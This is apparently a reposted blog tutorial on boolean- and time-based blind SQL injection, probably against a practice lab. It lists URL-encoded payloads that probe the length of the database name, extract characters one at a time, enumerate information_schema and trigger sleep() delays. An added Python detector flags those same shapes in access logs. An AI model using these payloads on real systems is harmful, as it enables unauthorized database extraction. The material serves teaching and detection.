Blind SQL injection

1. Boolean-based blind injection

Determine the injection type:
/?id=1%27%20%20and%201=1%20--+
/?id=1%27%20%20and%201=2%20--+
The two pages differ, so this is a boolean-based blind injection.

Determine the length of the current database name:
/?id=1%27%20and%20length((select%20database()))>1--+
/?id=1%27%20and%20length((select%20database()))>10--+
/?id=1%27%20and%20length((select%20database()))>7--+
/?id=1%27%20and%20length((select%20database()))>8--+
The current database name is 8 characters long.

Query the database name length through information_schema:
id=1%27%20and%20length((select%20schema_name%20from%20information_schema.schemata%20limit%200,1))>8%20--+
id=1%27%20and%20length((select%20schema_name%20from%20information_schema.schemata%20limit%200,1))>20%20--+
id=1%27%20and%20length((select%20schema_name%20from%20information_schema.schemata%20limit%200,1))=18%20--+
id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=100%20--+
For convenience I captured the request with Burp and brute-forced it. The first character is i.
id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),12,1))=100%20--+
Using the method above, the first database is found to be information_schema.
id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%206,1),12,1))>1%20--+
Use limit to determine the number of databases. Use sqlmap to dump the remaining database names. The rest is done with sqlmap, dumping table names.

2. Time-based blind injection

With ‘" and 1=1 --+’ and ‘" and 1=2 --+’ the two pages are exactly the same.
id=1"%20and%20sleep(5)%20--+
The page loads with a delay.

Determine the length of the current database:
id=1"%20and%20if(length((select%20database()))>1,sleep(5),1)%20--+
id=1"%20and%20if(length((select%20database()))=8,sleep(5),1)%20--+
So the current database name is 8 characters long.

Guess the first letter:
id=1"%20and%20if(ascii(substr((select%20database()),1,1))>8,sleep(5),1)%20--+
At the same time brute-force with Burp, using if(condition,sleep(1000),sleep(1)) so the correct ASCII value is easy to find in the results. The rest is done with sqlmap.
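As an added example, not part of the original write-up: a Python detector that takes the defender's view of the probes above and runs it over web-server access logs. It URL-decodes each query string and flags the shapes used in the post (the and 1=1 / and 1=2 pair, length() and ascii(substr()) comparisons, sleep() inside if(), information_schema lookups), and it groups requests from one client that differ only in a numeric literal, which is what the Burp brute-forcing described above looks like from the server side. The log lines, IP addresses and /Less-N/ paths are constructed for the demo and are not real traffic.

```python
"""Detect boolean- and time-based blind SQLi probes in web access logs.

Added example (not from the original write-up). Signature rules match the
payload shapes shown in the post after URL-decoding the query string; a
second heuristic counts requests per client that differ only in a numeric
literal, the footprint of character-by-character brute-forcing.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2019:10:00:01 +0800] "GET /Less-8/?id=1%27%20%20and%201=1%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [10/Dec/2019:10:00:02 +0800] "GET /Less-8/?id=1%27%20%20and%201=2%20--+ HTTP/1.1" 200 311
10.0.0.5 - - [10/Dec/2019:10:00:03 +0800] "GET /Less-8/?id=1%27%20and%20length((select%20database()))>7--+ HTTP/1.1" 200 512
10.0.0.5 - - [10/Dec/2019:10:00:04 +0800] "GET /Less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=100%20--+ HTTP/1.1" 200 311
10.0.0.5 - - [10/Dec/2019:10:00:04 +0800] "GET /Less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=101%20--+ HTTP/1.1" 200 311
10.0.0.5 - - [10/Dec/2019:10:00:04 +0800] "GET /Less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=102%20--+ HTTP/1.1" 200 311
10.0.0.7 - - [10/Dec/2019:10:00:09 +0800] "GET /Less-9/?id=1%22%20and%20if(length((select%20database()))=8,sleep(5),1)%20--+ HTTP/1.1" 200 512
10.0.0.9 - - [10/Dec/2019:10:00:10 +0800] "GET /Less-8/?id=3 HTTP/1.1" 200 512
10.0.0.9 - - [10/Dec/2019:10:00:11 +0800] "GET /search?q=sleepy+cats HTTP/1.1" 200 900
"""

# Combined-log-format request line: client IP and request path are what we need.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" \d{3} \d+'
)

# Each rule is applied to the URL-decoded, lower-cased query string.
RULES = [
    ("boolean_tautology", re.compile(r"\band\s+1\s*=\s*[12]\b")),
    ("length_probe", re.compile(r"\blength\s*\(\s*\(?\s*select\b")),
    ("char_extraction", re.compile(r"\bascii\s*\(\s*substr")),
    ("time_delay", re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    ("schema_enum", re.compile(r"\binformation_schema\.")),
]


def decode_query(path: str) -> str:
    """Return the URL-decoded query string of a request path, lower-cased.

    Decoding first matters: the probes arrive as %27, %20, '+' and so on,
    and a rule written against the raw path is trivially evaded by encoding.
    """
    _, _, query = path.partition("?")
    return unquote_plus(query).lower()


def classify_request(path: str) -> list[str]:
    """Return the names of every rule the request's query string matches."""
    decoded = decode_query(path)
    return [name for name, rx in RULES if rx.search(decoded)]


def template(path: str) -> str:
    """Collapse numeric literals so requests differing only in a number group together."""
    return re.sub(r"\d+", "N", decode_query(path))


def analyse(log_text: str, burst_threshold: int = 3) -> dict:
    """Run the signature rules and the brute-force heuristic over a log.

    Returns {"hits": [(ip, decoded_query, [rules])],
             "bursts": {(ip, template): count}} where count >= burst_threshold.
    """
    hits = []
    buckets = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole run
        ip, path = m["ip"], m["path"]
        rules = classify_request(path)
        if rules:
            hits.append((ip, decode_query(path), rules))
            buckets[(ip, template(path))] += 1
    bursts = {key: n for key, n in buckets.items() if n >= burst_threshold}
    return {"hits": hits, "bursts": bursts}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for ip, query, rules in result["hits"]:
        print(f"{ip}  {rules}  {query}")
    for (ip, tmpl), n in result["bursts"].items():
        print(f"burst: {ip} sent {n} requests matching template {tmpl!r}")
```

The burst heuristic is what catches the character-extraction phase: each individual request in lines 4 to 6 of the sample is only one probe, but three requests from the same client that are identical except for the compared ASCII value are the server-side shadow of a brute-force loop, and a real deployment would raise the threshold and add a time window. The signature rules alone also flag the time-based variant even though it returns an identical page, because the evidence is in the request, not in the response.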

Reposted from www.cnblogs.com/IAmFuture/p/12037752.html